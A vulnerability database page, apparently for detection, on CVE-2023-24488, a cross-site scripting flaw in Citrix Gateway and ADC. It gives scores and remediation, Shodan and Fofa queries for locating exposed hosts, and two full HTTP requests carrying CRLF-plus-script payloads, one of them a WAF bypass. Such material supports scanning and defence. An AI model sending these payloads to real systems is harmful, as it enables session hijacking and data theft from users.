🔙 목록으로 돌아가기

CVE-2023-24488: Citrix Gateway and Citrix ADC - Cross-Site Scripting

TitleCitrix Gateway and Citrix ADC - Cross-Site Scripting
Authorjohnk3r,DhiyaneshDk
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the necessary patches or updates provided by Citrix to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.91357
CVE IDCVE-2023-24488
CWE IDCWE-79
Shodan Querytitle:"Citrix Gateway"http.title:"citrix gateway"
Fofa Querytitle="citrix gateway"
Tags cve2023 cve citrix xss adc vkev vuln

🔍 Vulnerability Description

Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation.

🌐 HTTP Request

GET /oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:128.12) Gecko/20100101 Firefox/128.12
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-24488.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-24488.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A